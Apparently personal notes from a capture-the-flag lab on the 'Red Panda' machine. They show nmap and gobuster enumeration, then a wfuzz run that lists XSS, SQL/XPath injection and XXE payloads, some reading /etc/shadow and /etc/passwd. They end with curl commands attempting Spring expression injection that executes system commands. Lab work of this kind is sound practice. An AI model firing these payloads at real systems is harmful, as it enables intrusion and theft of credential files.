# Red Panda ### init nmap scan ```bash Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-01 11:23 MDT Initiating Ping Scan at 11:23 Scanning 10.10.11.170 [2 ports] Completed Ping Scan at 11:23, 0.07s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 11:23 Completed Parallel DNS resolution of 1 host. at 11:23, 0.02s elapsed Initiating Connect Scan at 11:23 Scanning 10.10.11.170 [1000 ports] Discovered open port 8080/tcp on 10.10.11.170 Discovered open port 22/tcp on 10.10.11.170 Increasing send delay for 10.10.11.170 from 0 to 5 due to max_successful_tryno increase to 4 Completed Connect Scan at 11:24, 14.96s elapsed (1000 total ports) Nmap scan report for 10.10.11.170 Host is up, received conn-refused (0.21s latency). Scanned at 2022-10-01 11:23:49 MDT for 15s Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE REASON 22/tcp open ssh syn-ack 8080/tcp open http-proxy syn-ack ``` ### full nmap scan ```bash # Nmap 7.92 scan initiated Sat Oct 1 11:26:21 2022 as: nmap -p- -sC -sV -oN ./scans/full-10.10.11.170 -vv 10.10.11.170 Nmap scan report for 10.10.11.170 Host is up, received conn-refused (0.18s latency). Scanned at 2022-10-01 11:26:21 MDT for 423s Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC82vTuN1hMqiqUfN+Lwih4g8rSJjaMjDQdhfdT8vEQ67urtQIyPszlNtkCDn6MNcBfibD/7Zz4r8lr1iNe/Afk6LJqTt3OWewzS2a1TpCrEbvoileYAl/Feya5PfbZ8mv77+MWEA+kT0pAw1xW9bpkhYCGkJQm9OYdcsEEg1i+kQ/ng3+GaFrGJjxqYaW1LXyXN1f7j9xG2f27rKEZoRO/9HOH9Y+5ru184QQXjW/ir+lEJ7xTwQA5U1GOW1m/AgpHIfI5j9aDfT/r4QMe+au+2yPotnOGBBJBz3ef+fQzj/Cq7OGRR96ZBfJ3i00B/Waw/RI19qd7+ybNXF/gBzptEYXujySQZSu92Dwi23itxJBolE6hpQ2uYVA8VBlF0KXESt3ZJVWSAsU3oguNCXtY7krjqPe6BZRy+lrbeska1bIGPZrqLEgptpKhz14UaOcH9/vpMYFdSKr24aMXvZBDK1GJg50yihZx8I9I367z0my8E89+TnjGFY2QTzxmbmU= | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A= | 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR 8080/tcp open http-proxy syn-ack | fingerprint-strings: | GetRequest: | HTTP/1.1 200 | Content-Type: text/html;charset=UTF-8 | Content-Language: en-US | Date: Sat, 01 Oct 2022 17:32:35 GMT | Connection: close | <!DOCTYPE html> | <html lang="en" dir="ltr"> | <head> | <meta charset="utf-8"> | <meta author="wooden_k"> | <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw --> | <link rel="stylesheet" href="css/panda.css" type="text/css"> | <link rel="stylesheet" href="css/main.css" type="text/css"> | <title>Red Panda Search | Made with Spring Boot</title> | </head> | <body> | <div class='pande'> | <div class='ear left'></div> | <div class='ear right'></div> | <div class='whiskers left'> | <span></span> | <span></span> | <span></span> | </div> | <div class='whiskers right'> | <span></span> | <span></span> | <span></span> | </div> | <div class='face'> | <div class='eye | HTTPOptions: | HTTP/1.1 200 | Allow: GET,HEAD,OPTIONS | Content-Length: 0 | Date: Sat, 01 Oct 2022 17:32:35 GMT | Connection: close | RTSPRequest: | HTTP/1.1 400 | Content-Type: text/html;charset=utf-8 | Content-Language: en | Content-Length: 435 | Date: Sat, 01 Oct 2022 17:32:35 GMT | Connection: close | <!doctype html><html lang="en"><head><title>HTTP Status 400 | Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 |_ Request</h1></body></html> |_http-title: Red Panda Search | Made with Spring Boot | http-methods: |_ Supported Methods: GET HEAD OPTIONS 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8080-TCP:V=7.92%I=7%D=10/1%Time=633879CA%P=x86_64-pc-linux-gnu%r(Ge SF:tRequest,690,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;charse SF:t=UTF-8\r\nContent-Language:\x20en-US\r\nDate:\x20Sat,\x2001\x20Oct\x20 SF:2022\x2017:32:35\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20htm SF:l>\n<html\x20lang=\"en\"\x20dir=\"ltr\">\n\x20\x20<head>\n\x20\x20\x20\ SF:x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<meta\x20author=\"woode SF:n_k\">\n\x20\x20\x20\x20<!--Codepen\x20by\x20khr2003:\x20https://codepe SF:n\.io/khr2003/pen/BGZdXw\x20-->\n\x20\x20\x20\x20<link\x20rel=\"stylesh SF:eet\"\x20href=\"css/panda\.css\"\x20type=\"text/css\">\n\x20\x20\x20\x2 SF:0<link\x20rel=\"stylesheet\"\x20href=\"css/main\.css\"\x20type=\"text/c SF:ss\">\n\x20\x20\x20\x20<title>Red\x20Panda\x20Search\x20\|\x20Made\x20w SF:ith\x20Spring\x20Boot</title>\n\x20\x20</head>\n\x20\x20<body>\n\n\x20\ SF:x20\x20\x20<div\x20class='pande'>\n\x20\x20\x20\x20\x20\x20<div\x20clas SF:s='ear\x20left'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='ear\x20r SF:ight'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='whiskers\x20left'> SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</div>\n\x20\x20\x20\x SF:20\x20\x20<div\x20class='whiskers\x20right'>\n\x20\x20\x20\x20\x20\x20\ SF:x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x SF:20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</ SF:div>\n\x20\x20\x20\x20\x20\x20<div\x20class='face'>\n\x20\x20\x20\x20\x SF:20\x20\x20\x20<div\x20class='eye")%r(HTTPOptions,75,"HTTP/1\.1\x20200\x SF:20\r\nAllow:\x20GET,HEAD,OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Sa SF:t,\x2001\x20Oct\x202022\x2017:32:35\x20GMT\r\nConnection:\x20close\r\n\ SF:r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/ SF:html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435 SF:\r\nDate:\x20Sat,\x2001\x20Oct\x202022\x2017:32:35\x20GMT\r\nConnection SF::\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>H SF:TTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x2 SF:0type=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1 SF:,\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x SF:20{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px SF:;}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{heigh SF:t:1px;background-color:#525D76;border:none;}</style></head><body><h1>HT SF:TP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html SF:>"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Oct 1 11:33:24 2022 -- 1 IP address (1 host up) scanned in 423.10 seconds ``` ### Gobuster ```bash $ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.11.170:8080 =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.11.170:8080 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/10/01 13:26:14 Starting gobuster in directory enumeration mode =============================================================== /error (Status: 500) [Size: 86] /search (Status: 405) [Size: 117] /stats (Status: 200) [Size: 987] =============================================================== 2022/10/01 13:27:04 Finished =============================================================== ``` ### potential sqli attacks `* \` - breaks the request, gives the sense that the escaped character is a quotation of some sort ### WFuzz ```bash wfuzz -c -w XML.txt -u http://10.10.11.170:8080/search -d "name=FUZZ" --hc 400 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://10.10.11.170:8080/search Total requests: 15 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000001: 500 0 L 3 W 120 Ch "count(/child::node())" 000000006: 200 28 L 68 W 937 Ch "<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRI PT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo >" 000000014: 200 28 L 71 W 843 Ch "<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATA FORMATAS=HTML></SPAN>" 000000012: 200 28 L 68 W 853 Ch "<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(' XSS');">]]>" 000000015: 200 28 L 69 W 888 Ch "<HTML xmlns:xss><?import namespace="xss" implementation="http://h a.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>" 000000003: 200 28 L 68 W 786 Ch "<name>','')); phpinfo(); exit;/*</name>" 000000011: 200 28 L 75 W 908 Ch "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEME NT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;< /foo>" 000000010: 200 28 L 75 W 908 Ch "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEME NT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;< /foo>" 000000013: 200 28 L 67 W 771 Ch "<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')" &gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="H TML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS= HTML></SPAN>" 000000007: 200 28 L 72 W 865 Ch "<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>" 000000004: 200 28 L 68 W 795 Ch "<![CDATA[<script>var n=0;while(true){n++;}</script>]]>" 000000008: 200 28 L 75 W 907 Ch "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEME NT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</ foo>" 000000005: 200 28 L 66 W 845 Ch "<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT <![CDATA[>]]>" 000000002: 200 28 L 70 W 780 Ch "x' or name()='username' or 'x'='y" 000000009: 200 28 L 75 W 908 Ch "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEME NT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;< /foo>" Total time: 0 Processed Requests: 15 Filtered Requests: 0 Requests/sec.: 0 ``` ### xml injection: ```bash= curl -v -X POST http://10.10.11.170:8080/search --data 'name=*{T(java.lang.System).getenv()}' curl -v -X POST http://10.10.11.170.8080/search --data 'name=*{T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}' ```